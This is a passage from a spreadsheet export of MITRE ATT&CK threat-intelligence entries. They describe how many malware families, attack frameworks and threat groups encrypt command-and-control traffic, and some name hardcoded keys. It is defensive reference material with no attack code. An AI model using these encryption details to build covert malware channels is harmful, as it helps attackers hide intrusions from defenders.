KEYPLUG
[KEYPLUG](https://attack.mitre.org/software/S1051) can use TLS-encrypted WebSocket Protocol (WSS) for C2.(Citation: Mandiant APT41)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) can use SSL and TLS for communications.(Citation: Github Koadic)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641)'s authentication and key exchange is performed using RSA-512.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) 
Machete
[Machete](https://attack.mitre.org/software/S0409) has used TLS-encrypted FTP to exfiltrate data.(Citation: Cylance Machete Mar 2017)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455)'s C2 communication has been encrypted using OpenSSL.(Citation: Medium Metamorfo Apr 2020) 
Mythic
[Mythic](https://attack.mitre.org/software/S0699) supports SSL encrypted C2.(Citation: Mythc Documentation)	
POSHSPY
[POSHSPY](https://attack.mitre.org/software/S0150) encrypts C2 traffic with AES and RSA.(Citation: FireEye POSHSPY April 2017)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) has encrypted C2 traffic with RSA.(Citation: FireEye MuddyWater Mar 2018)
Pay2Key
[Pay2Key](https://attack.mitre.org/software/S0556) has used RSA encrypted communications with C2.(Citation: Check Point Pay2Key November 2020)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.(Citation: Leonardo Turla Penquin May 2020)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) used TLS to encrypt command and control (C2) communications.(Citation: Talos PoetRAT April 2020)
Pupy
[Pupy](https://attack.mitre.org/software/S0192)'s default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.(Citation: GitHub Pupy)
REvil
[REvil](https://attack.mitre.org/software/S0496) has encrypted C2 communications with the ECIES algorithm.(Citation: Kaspersky Sodin July 2019)
Rising Sun
[Rising Sun](https://attack.mitre.org/software/S0448) variants can use SSL for encrypting C2 communications.(Citation: Bleeping Computer Op Sharpshooter March 2019)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to send a random 64-byte RC4 key to communicate with actor-controlled C2 servers by using an RSA public key.(Citation: Bitdefender Sardonic Aug 2021)
ServHelper
[ServHelper](https://attack.mitre.org/software/S0382) may set up a reverse SSH tunnel to give the attacker access to services running on the victim, such as RDP.(Citation: Proofpoint TA505 Jan 2019)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can use mutual TLS and RSA  cryptography to exchange a session key.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: Bishop Fox Sliver Framework August 2019)(Citation: GitHub Sliver Encryption)
Small Sieve
[Small Sieve](https://attack.mitre.org/software/S1035) can use SSL/TLS for its HTTPS Telegram Bot API-based C2 channel.(Citation: DHS CISA AA22-055A MuddyWater February 2022)
SodaMaster
[SodaMaster](https://attack.mitre.org/software/S0627) can use a hardcoded RSA key to encrypt some of its C2 traffic.(Citation: Securelist APT10 March 2021)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) can SSL encrypt C2 traffic.(Citation: BlackBerry CostaRicto November 2020)(Citation: FireEye FiveHands April 2021)(Citation: CISA AR21-126A FIVEHANDS May 2021)
StrongPity
[StrongPity](https://attack.mitre.org/software/S0491) has encrypted C2 traffic using SSL/TLS.(Citation: Talos Promethium June 2020)
Sykipot
[Sykipot](https://attack.mitre.org/software/S0018) uses SSL for encrypting C2 communications.(Citation: Blasco 2013)
TinyTurla
[TinyTurla](https://attack.mitre.org/software/S0668) has the ability to encrypt C2 traffic with SSL/TLS.(Citation: Talos TinyTurla September 2021)
Tor
[Tor](https://attack.mitre.org/software/S0183) encapsulates traffic in multiple layers of encryption, using TLS by default.(Citation: Dingledine Tor The Second-Generation Onion Router)
Trojan.Karagany
[Trojan.Karagany](https://attack.mitre.org/software/S0094) can secure C2 communications with SSL and TLS.(Citation: Secureworks Karagany July 2019)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) has used a combination of a Diffie-Hellman key exchange mixed with a pre-shared key (PSK) to encrypt its top layer of C2 communications.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Volgmer
Some [Volgmer](https://attack.mitre.org/software/S0180) variants use SSL to encrypt C2 communications.(Citation: US-CERT Volgmer Nov 2017)
WannaCry
[WannaCry](https://attack.mitre.org/software/S0366) uses [Tor](https://attack.mitre.org/software/S0183) for command and control traffic and routes a custom cryptographic protocol over the [Tor](https://attack.mitre.org/software/S0183) circuit.(Citation: SecureWorks WannaCry Analysis)
WellMail
[WellMail](https://attack.mitre.org/software/S0515) can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)
WellMess
[WellMess](https://attack.mitre.org/software/S0514) can communicate to C2 with mutual TLS where client and server mutually check certificates.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)(Citation: NCSC APT29 July 2020)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can use RSA-4096 to encrypt data sent to its C2 server.(Citation: MalwareBytes WoodyRAT Aug 2022) 
XTunnel
[XTunnel](https://attack.mitre.org/software/S0117) uses SSL/TLS and RC4 to encrypt traffic.(Citation: Invincea XTunnel)(Citation: ESET Sednit Part 2)
Zebrocy
[Zebrocy](https://attack.mitre.org/software/S0251) uses SSL and AES ECB for encrypting C2 communications.(Citation: ESET Zebrocy Nov 2018)(Citation: ESET Zebrocy May 2019)(Citation: CISA Zebrocy Oct 2020) 
adbupd
[adbupd](https://attack.mitre.org/software/S0202) contains a copy of the OpenSSL library to encrypt C2 traffic.(Citation: Microsoft PLATINUM April 2016)
</t>
  </si>
  <si>
    <t xml:space="preserve">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Intrusion Prevention
Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level.
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.(Citation: Talos Frankenstein June 2019)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used an AES key to communicate with their C2 server.(Citation: McAfee Lazarus Jul 2020)
APT28
[APT28](https://attack.mitre.org/groups/G0007) installed a Delphi backdoor that used a custom algorithm for C2 communications.(Citation: ESET Zebrocy May 2019)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used AES for encryption of command and control traffic.(Citation: FireEye APT33 Guardrail)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic. [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Darkhotel
[Darkhotel](https://attack.mitre.org/groups/G0012) has used AES-256 and 3DES for C2 communications.(Citation: Microsoft DUBNIUM July 2016)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used AES-128 to encrypt C2 traffic.(Citation: Zscaler Higaisa 2020)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has encrypted network communications with AES.(Citation: Kaspersky Cloud Atlas December 2014)
Lazarus Group
Several [Lazarus Group](https://attack.mitre.org/groups/G0032) malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another [Lazarus Group](https://attack.mitre.org/groups/G0032) malware sample XORs C2 traffic. Other [Lazarus Group](https://attack.mitre.org/groups/G0032) malware uses Caracachs encryption to encrypt C2 payloads. [Lazarus Group](https://attack.mitre.org/groups/G0032) has also used AES to encrypt C2 traffic.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: McAfee Lazarus Resurfaces Feb 2018)(Citation: McAfee GhostSecret)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used AES to encrypt C2 responses.(Citation: Talos MuddyWater Jan 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has encrypted C2 communications with RC4.(Citation: Recorded Future REDDELTA July 2020)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware encrypts C2 traffic using RC4 with a hard-coded key.(Citation: Citizen Lab Stealth Falcon May 2016)
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used a version of the Awen web shell that employed AES encryption and decryption for C2 communications.(Citation: Secureworks BRONZE SILHOUETTE May 2023)
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used AES encrypted communications in C2.(Citation: Zscaler APT31 Covid-19 October 2020)
3PARA RAT
[3PARA RAT](https://attack.mitre.org/software/S0066) command and control commands are encrypted within the HTTP C2 channel using the DES algorithm in CBC mode with a key derived from the MD5 hash of the string HYF54&amp;%9&amp;jkMCXuiS. [3PARA RAT](https://attack.mitre.org/software/S0066) will use an 8-byte XOR key derived from the string HYF54&amp;%9&amp;jkMCXuiS if the DES decoding fails(Citation: CrowdStrike Putter Panda)
4H RAT
[4H RAT](https://attack.mitre.org/software/S0065) obfuscates C2 communication using a 1-byte XOR with the key 0xBE.(Citation: CrowdStrike Putter Panda)
ADVSTORESHELL
A variant of [ADVSTORESHELL](https://attack.mitre.org/software/S0045) encrypts some C2 with 3DES.(Citation: Bitdefender APT28 Dec 2015)
Attor
[Attor](https://attack.mitre.org/software/S0438) has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.(Citation: ESET Attor Oct 2019)
Azorult
[Azorult](https://attack.mitre.org/software/S0344) can encrypt C2 traffic using XOR.(Citation: Unit42 Azorult Nov 2018)(Citation: Proofpoint Azorult July 2018)
BADCALL
[BADCALL](https://attack.mitre.org/software/S0245) encrypts C2 traffic using an XOR/ADD cipher.(Citation: US-CERT BADCALL)
BADNEWS
[BADNEWS](https://attack.mitre.org/software/S0128) encrypts C2 data with a ROR by 3 and an XOR by 0x23.(Citation: Forcepoint Monsoon)(Citation: TrendMicro Patchwork Dec 2017)
BBSRAT
[BBSRAT](https://attack.mitre.org/software/S0127) uses a custom encryption algorithm on data sent back to the C2 server over HTTP.(Citation: Palo Alto Networks BBSRAT)
BLINDINGCAN
[BLINDINGCAN](https://attack.mitre.org/software/S0520) has encrypted its C2 traffic with RC4.(Citation: US-CERT BLINDINGCAN Aug 2020)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has used AES encryption for C2 communication.(Citation: CheckPoint Bandook Nov 2020)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can send C2 communications with XOR encryption.(Citation: NCC Group Team9 June 2020)
BendyBear
[BendyBear](https://attack.mitre.org/software/S0574) communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks.(Citation: Unit42 BendyBear Feb 2021) 
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268) variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some [Bisonal](https://attack.mitre.org/software/S0268) samples encrypt C2 communications with RC4.(Citation: Unit 42 Bisonal July 2018)(Citation: Kaspersky CactusPete Aug 2020)(Citation: Talos Bisonal Mar 2020) 
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) can XOR-encrypt C2 communications.(Citation: ESET ForSSHe December 2018)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can encrypt C2 requests and responses with RC4(Citation: Proofpoint Bumblebee April 2022)
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with RC4.(Citation: ESET Sednit Part 2)
CORESHELL
[CORESHELL](https://attack.mitre.org/software/S0137) C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.(Citation: FireEye APT28)
CallMe
[CallMe](https://attack.mitre.org/software/S0077) uses AES to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)
Carbanak
[Carbanak](https://attack.mitre.org/software/S0030) encrypts the message body of HTTP traffic with RC2 (in CBC mode). [Carbanak](https://attack.mitre.org/software/S0030) also uses XOR with random keys for its communications.(Citation: Kaspersky Carbanak)(Citation: FireEye CARBANAK June 2017)
Cardinal RAT
[Cardinal RAT](https://attack.mitre.org/software/S0348) uses a secret key with a series of XOR and addition operations to encrypt C2 traffic.(Citation: PaloAlto CardinalRat Apr 2017)
ChChes
[ChChes](https://attack.mitre.org/software/S0144) can encrypt C2 traffic with AES or RC4.(Citation: Palo Alto menuPass Feb 2017)(Citation: JPCERT ChChes Feb 2017)
Chaos
[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell connection on 8338/TCP, encrypted via AES.(Citation: Chaos Stolen Backdoor)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can send additional modules over C2 encrypted with a simple substitution cipher.(Citation: Check Point APT35 CharmPower January 2022)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.(Citation: Talos Cobalt Strike September 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) encrypts command and control communications with RC4.(Citation: Palo Alto Comnie)
CosmicDuke
[CosmicDuke](https://attack.mitre.org/software/S0050) contains a custom version of the RC4 algorithm that includes a programming error.(Citation: F-Secure Cosmicduke)
Daserf
[Daserf](https://attack.mitre.org/software/S0187) uses RC4 encryption to obfuscate HTTP traffic.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) obfuscates C2 traffic with variable 4-byte XOR keys.(Citation: Fidelis Turbo)
Dipsind
[Dipsind](https://attack.mitre.org/software/S0200) encrypts C2 data with AES256 in ECB mode.(Citation: Microsoft PLATINUM April 2016)
Downdelph
[Downdelph](https://attack.mitre.org/software/S0134) uses RC4 to encrypt C2 responses.(Citation: ESET Sednit Part 3)
Dridex
[Dridex](https://attack.mitre.org/software/S0384) has encrypted traffic with RC4.(Citation: Kaspersky Dridex May 2017)
Duqu
The [Duqu](https://attack.mitre.org/software/S0038) command and control protocol's data stream can be encrypted with AES-CBC.(Citation: Symantec W32.Duqu)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.(Citation: ESET Ebury Feb 2014)
Elise
[Elise](https://attack.mitre.org/software/S0081) encrypts exfiltrated data with RC4.(Citation: Lotus Blossom Jun 2015)
Emissary
The C2 server response to a beacon sent by a variant of [Emissary](https://attack.mitre.org/software/S0082) contains a 36-character GUID value that is used as an encryption key for subsequent network communications. Some variants of [Emissary](https://attack.mitre.org/software/S0082) use various XOR operations to encrypt C2 data.(Citation: Lotus Blossom Dec 2015)
Epic
[Epic](https://attack.mitre.org/software/S0091) encrypts commands from the C2 server using a hardcoded key.(Citation: Kaspersky Turla)
Explosive
[Explosive](https://attack.mitre.org/software/S0569) has encrypted communications with the RC4 method.(Citation: ClearSky Lebanese Cedar Jan 2021) 
FALLCHILL
[FALLCHILL](https://attack.mitre.org/software/S0181) encrypts C2 data with RC4 encryption.(Citation: US-CERT FALLCHILL Nov 2017)(Citation: CISA AppleJeus Feb 2021)
FakeM
The original variant of [FakeM](https://attack.mitre.org/software/S0076) encrypts C2 traffic using a custom encryption cipher that uses an XOR key of “YHCRA” and bit rotation between each XOR operation. Some variants of [FakeM](https://attack.mitre.org/software/S0076) use RC4 to encrypt C2 traffic.(Citation: Scarlet Mimic Jan 2016)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) can AES encrypt C2 communications.(Citation: ESET Dukes October 2019)
Felismus
Some [Felismus](https://attack.mitre.org/software/S0171) samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.(Citation: Forcepoint Felismus Mar 2017)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used SEAL encryption during the initial C2 handshake.(Citation: Proofpoint TA505 Mar 2018)
FoggyWeb
[FoggyWeb](https://attack.mitre.org/software/S0661) has used a dynamic XOR key and custom XOR methodology for C2 communications.(Citation: MSTIC FoggyWeb September 2021)  
Gazer
[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses 3DES.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)
GreyEnergy
[GreyEnergy](https://attack.mitre.org/software/S0342) encrypts communications using AES256.(Citation: ESET GreyEnergy Oct 2018)
GrimAgent
[GrimAgent](https://attack.mitre.org/software/S0632) can use an AES key to encrypt C2 communications.(Citation: Group IB GrimAgent July 2021)
H1N1
[H1N1](https://attack.mitre.org/software/S0132) encrypts C2 traffic using an RC4 key.(Citation: Cisco H1N1 Part 2)
HAMMERTOSS
Before being appended to image files, [HAMMERTOSS](https://attack.mitre.org/software/S0037) commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.(Citation: FireEye APT29)
Helminth
[Helminth](https://attack.mitre.org/software/S0170) encrypts data sent to its C2 server over HTTP with RC4.(Citation: Palo Alto OilRig May 2016)
Hi-Zor
[Hi-Zor](https://attack.mitre.org/software/S0087) encrypts C2 traffic with a double XOR using two distinct single-byte keys.(Citation: Fidelis Hi-Zor)
HiddenWasp
[HiddenWasp](https://attack.mitre.org/software/S0394) uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.(Citation: Intezer HiddenWasp Map 2019)
Hikit
[Hikit](https://attack.mitre.org/software/S0009) performs XOR encryption.(Citation: Novetta-Axiom)
HotCroissant
[HotCroissant](https://attack.mitre.org/software/S0431) has compressed network communications and encrypted them with a custom stream cipher.(Citation: Carbon Black HotCroissant April 2020)(Citation: US-CERT HOTCROISSANT February 2020)
Hydraq
[Hydraq](https://attack.mitre.org/software/S0203) C2 traffic is encrypted using bitwise NOT and XOR operations.(Citation: Symantec Hydraq Jan 2010)
HyperStack
[HyperStack](https://attack.mitre.org/software/S0537) has used RSA encryption for C2 communications.(Citation: Accenture HyperStack October 2020)
IceApple
The [IceApple](https://attack.mitre.org/software/S1022) Result Retriever module can AES encrypt C2 responses.(Citation: CrowdStrike IceApple May 2022)
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) uses variations of a simple XOR encryption routine for C&amp;C communications.(Citation: ESET InvisiMole June 2018)
KEYMARBLE
[KEYMARBLE](https://attack.mitre.org/software/S0271) uses a customized XOR algorithm to encrypt C2 communications.(Citation: US-CERT KEYMARBLE Aug 2018)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has used AES to encrypt C2 traffic.(Citation: Malwarebytes KONNI Evolves Jan 2022)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641)'s post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021) 
Komplex
The [Komplex](https://attack.mitre.org/software/S0162) C2 channel uses an 11-byte XOR algorithm to hide data.(Citation: Sofacy Komplex Trojan)
LightNeuron
[LightNeuron](https://attack.mitre.org/software/S0395) uses AES to encrypt C2 traffic.(Citation: ESET LightNeuron May 2019)
LookBack
[LookBack](https://attack.mitre.org/software/S0582) uses a modified version of RC4 for data transfer.(Citation: Proofpoint LookBack Malware Aug 2019)
Lucifer
[Lucifer](https://attack.mitre.org/software/S0532) can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.(Citation: Unit 42 Lucifer June 2020)
Lurid
[Lurid](https://attack.mitre.org/software/S0010) performs XOR encryption.(Citation: Villeneuve 2011)
Machete
[Machete](https://attack.mitre.org/software/S0409) has used AES to exfiltrate documents.(Citation: ESET Machete July 2019)
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can encrypt its C2 traffic with RC4.(Citation: SentinelLabs Metador Sept 2022)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has encrypted C2 commands with AES-256.(Citation: ESET Casbaneiro Oct 2019) 
Mongall
[Mongall](https://attack.mitre.org/software/S1026) has the ability to RC4 encrypt C2 communications.(Citation: SentinelOne Aoqin Dragon June 2022)
MoonWind
[MoonWind](https://attack.mitre.org/software/S0149) encrypts C2 traffic using RC4 with a static key.(Citation: Palo Alto MoonWind March 2017)
More_eggs
[More_eggs](https://attack.mitre.org/software/S0284) has used an RC4-based encryption method for its C2 communications.(Citation: Security Intelligence More Eggs Aug 2019)
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.(Citation: ESET Turla Mosquito Jan 2018)
NDiskMonitor
[NDiskMonitor](https://attack.mitre.org/software/S0272) uses AES to encrypt certain information sent over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)
NETEAGLE
[NETEAGLE](https://attack.mitre.org/software/S0034) will decrypt resources it downloads with HTTP requests by using RC4 with the key "ScoutEagle."(Citation: FireEye APT30)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) can use AES encryption for C2 data transferred.(Citation: Red Canary NETWIRE January 2020)
NanoCore
[NanoCore](https://attack.mitre.org/software/S0336) uses DES to encrypt the C2 traffic.(Citation: PaloAlto NanoCore Feb 2016)
Nebulae
[Nebulae](https://attack.mitre.org/software/S0630) can use RC4 and XOR to encrypt C2 communications.(Citation: Bitdefender Naikon April 2021)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) encrypts data sent back to the C2 using AES in CBC mode with a null initialization vector (IV) and a key sent from the server that is padded to 32 bytes.(Citation: Unit42 OceanLotus 2017)
Okrum
[Okrum](https://attack.mitre.org/software/S0439) uses AES to encrypt network traffic. The key can be hardcoded or negotiated with the C2 server in the registration phase. (Citation: ESET Okrum July 2019)
PLAINTEE
[PLAINTEE](https://attack.mitre.org/software/S0254) encodes C2 beacons using XOR.(Citation: Rancor Unit42 June 2018)
PLEAD
[PLEAD](https://attack.mitre.org/software/S0435) has used RC4 encryption to download modules.(Citation: JPCert PLEAD Downloader June 2018)
POWERTON
[POWERTON](https://attack.mitre.org/software/S0371) has used AES for encrypting C2 traffic.(Citation: FireEye APT33 Guardrail)
Pandora
[Pandora](https://attack.mitre.org/software/S0664) has the ability to encrypt communications with D3DES.(Citation: Trend Micro Iron Tiger April 2021)
PingPull
[PingPull](https://attack.mitre.org/software/S1031) can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications.(Citation: Unit 42 PingPull Jun 2022)
PipeMon
[PipeMon](https://attack.mitre.org/software/S0501) communications are RC4 encrypted.(Citation: ESET PipeMon May 2020)
PlugX
[PlugX](https://attack.mitre.org/software/S0013) can use RC4 encryption in C2 communications.(Citation: Proofpoint TA416 Europe March 2022)
PoisonIvy
[PoisonIvy](https://attack.mitre.org/software/S0012) uses the Camellia cipher to encrypt communications.(Citation: FireEye Poison Ivy)
Prikormka
[Prikormka](https://attack.mitre.org/software/S0113) encrypts some C2 traffic with the Blowfish cipher.(Citation: ESET Operation Groundbait)
QUIETCANARY
[QUIETCANARY](https://attack.mitre.org/software/S1076) can RC4 encrypt C2 communications.(Citation: Mandiant Suspected Turla Campaign February 2023)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can RC4 encrypt strings in C2 communication.(Citation: Kaspersky QakBot September 2021)
QuasarRAT
[QuasarRAT](https://attack.mitre.org/software/S0262) uses AES with a hardcoded pre-shared key to encrypt network communication.(Citation: GitHub QuasarRAT)(Citation: Volexity Patchwork June 2018)(Citation: CISA AR18-352A Quasar RAT December 2018)
RDAT
[RDAT](https://attack.mitre.org/software/S0495) has used AES ciphertext to encode C2 communications.(Citation: Unit42 RDAT July 2020)
RIPTIDE
[APT12](https://attack.mitre.org/groups/G0005) has used the [RIPTIDE](https://attack.mitre.org/software/S0003) RAT, which communicates over HTTP with a payload encrypted with RC4.(Citation: Moran 2014)
RTM
[RTM](https://attack.mitre.org/software/S0148) encrypts C2 traffic with a custom RC4 variant.(Citation: ESET RTM Feb 2017)
RainyDay
[RainyDay](https://attack.mitre.org/software/S0629) can use RC4 to encrypt C2 communications.(Citation: Bitdefender Naikon April 2021)
RedLeaves
[RedLeaves](https://attack.mitre.org/software/S0153) has encrypted C2 traffic with RC4, previously using keys of 88888888 and babybear.(Citation: PWC Cloud Hopper Technical Annex April 2017)
Rifdoor
[Rifdoor](https://attack.mitre.org/software/S0433) has encrypted command and control (C2) communications with a stream cipher.(Citation: Carbon Black HotCroissant April 2020)
RotaJakiro
[RotaJakiro](https://attack.mitre.org/software/S1078) encrypts C2 communication using a combination of AES, XOR, ROTATE encryption, and ZLIB compression.(Citation: RotaJakiro 2021 netlab360 analysis)
SMOKEDHAM
[SMOKEDHAM](https://attack.mitre.org/software/S0649) has encrypted its C2 traffic with RC4.(Citation: FireEye SMOKEDHAM June 2021)
SNUGRIDE
[SNUGRIDE](https://attack.mitre.org/software/S0159) encrypts C2 traffic using AES with a static key.(Citation: FireEye APT10 April 2017)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) encrypted C2 traffic using a single-byte-XOR cipher.(Citation: FireEye SUNBURST Backdoor December 2020)
Sakula
[Sakula](https://attack.mitre.org/software/S0074) encodes C2 traffic with single-byte XOR keys.(Citation: Dell Sakula)
Sardonic
[Sardonic](https://attack.mitre.org/software/S1085) has the ability to use an RC4 key to encrypt communications to and from actor-controlled C2 servers.(Citation: Bitdefender Sardonic Aug 2021)
SeaDuke
[SeaDuke](https://attack.mitre.org/software/S0053) C2 traffic has been encrypted with RC4 and AES.(Citation: Mandiant No Easy Breach)(Citation: Unit 42 SeaDuke 2015)
SideTwist
[SideTwist](https://attack.mitre.org/software/S0610) can encrypt C2 communications with a randomly generated key.(Citation: Check Point APT34 April 2021)
Sliver
[Sliver](https://attack.mitre.org/software/S0633) can use AES-GCM-256 to encrypt a session key for C2 message exchange.(Citation: GitHub Sliver Encryption)
SodaMaster
[SodaMaster](https://attack.mitre.org/software/S0627) can use RC4 to encrypt C2 communications.(Citation: Securelist APT10 March 2021)
SombRAT
[SombRAT](https://attack.mitre.org/software/S0615) has encrypted its C2 communications with AES.(Citation: BlackBerry CostaRicto November 2020)
StrifeWater
[StrifeWater](https://attack.mitre.org/software/S1034) can encrypt C2 traffic using XOR with a hard coded key.(Citation: Cybereason StrifeWater Feb 2022)
Stuxnet
[Stuxnet](https://attack.mitre.org/software/S0603) encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. [Stuxnet](https://attack.mitre.org/software/S0603) also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)
Sys10
[Sys10](https://attack.mitre.org/software/S0060) uses an XOR 0x1 loop to encrypt its C2 domain.(Citation: Baumgartner Naikon 2015)
SysUpdate
[SysUpdate](https://attack.mitre.org/software/S0663) has used DES to encrypt all C2 communications.(Citation: Lunghi Iron Tiger Linux)
TAINTEDSCRIBE
[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption.(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020)
TSCookie
[TSCookie](https://attack.mitre.org/software/S0436) has encrypted network communications with RC4.(Citation: JPCert TSCookie March 2018)
Taidoor
[Taidoor](https://attack.mitre.org/software/S0011) uses RC4 to encrypt the message body of HTTP content.(Citation: TrendMicro Taidoor)(Citation: CISA MAR-10292089-1.v2 TAIDOOR August 2021)
Torisma
[Torisma](https://attack.mitre.org/software/S0678) has encrypted its C2 communications using XOR and VEST-32.(Citation: McAfee Lazarus Nov 2020)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) uses a custom crypter leveraging Microsoft’s CryptoAPI to encrypt C2 traffic.(Citation: Fidelis TrickBot Oct 2016)Newer versions of [TrickBot](https://attack.mitre.org/software/S0266) have been known to use `bcrypt` to encrypt and digitally sign responses to their C2 server. (Citation: Bitdefender Trickbot C2 infra Nov 2020)
UPPERCUT
Some versions of [UPPERCUT](https://attack.mitre.org/software/S0275) have used the hard-coded string “this is the encrypt key” for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.(Citation: FireEye APT10 Sept 2018)
Uroburos
[Uroburos](https://attack.mitre.org/software/S0022) can encrypt the data beneath its http2 or tcp encryption at the session layer with CAST-128, using a different key for incoming and outgoing data.(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023)
Volgmer
[Volgmer](https://attack.mitre.org/software/S0180) uses a simple XOR cipher to encrypt traffic and files.(Citation: US-CERT Volgmer 2 Nov 2017)
WarzoneRAT
[WarzoneRAT](https://attack.mitre.org/software/S0670) can encrypt its C2 with RC4 with the password `warzone160\x00`.(Citation: Check Point Warzone Feb 2020)
WellMess
[WellMess](https://attack.mitre.org/software/S0514) can encrypt HTTP POST data using RC6 and a dynamically generated AES key encrypted with a hard coded RSA public key.(Citation: PWC WellMess July 2020)(Citation: PWC WellMess C2 August 2020)(Citation: CISA WellMess July 2020)
Winnti for Linux
[Winnti for Linux](https://attack.mitre.org/software/S0430) has used a custom TCP protocol with four-byte XOR for command and control (C2).(Citation: Chronicle Winnti for Linux May 2019)
Winnti for Windows
[Winnti for Windows](https://attack.mitre.org/software/S0141) can XOR encrypt C2 traffic.(Citation: Novetta Winnti April 2015)
Woody RAT
[Woody RAT](https://attack.mitre.org/software/S1065) can use AES-CBC to encrypt data sent to its C2 server.(Citation: MalwareBytes WoodyRAT Aug 2022) 
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses RC4 encryption over TCP to communicate with its C2 server.(Citation: trendmicro xcsset xcode project 2020)  
ZeroT
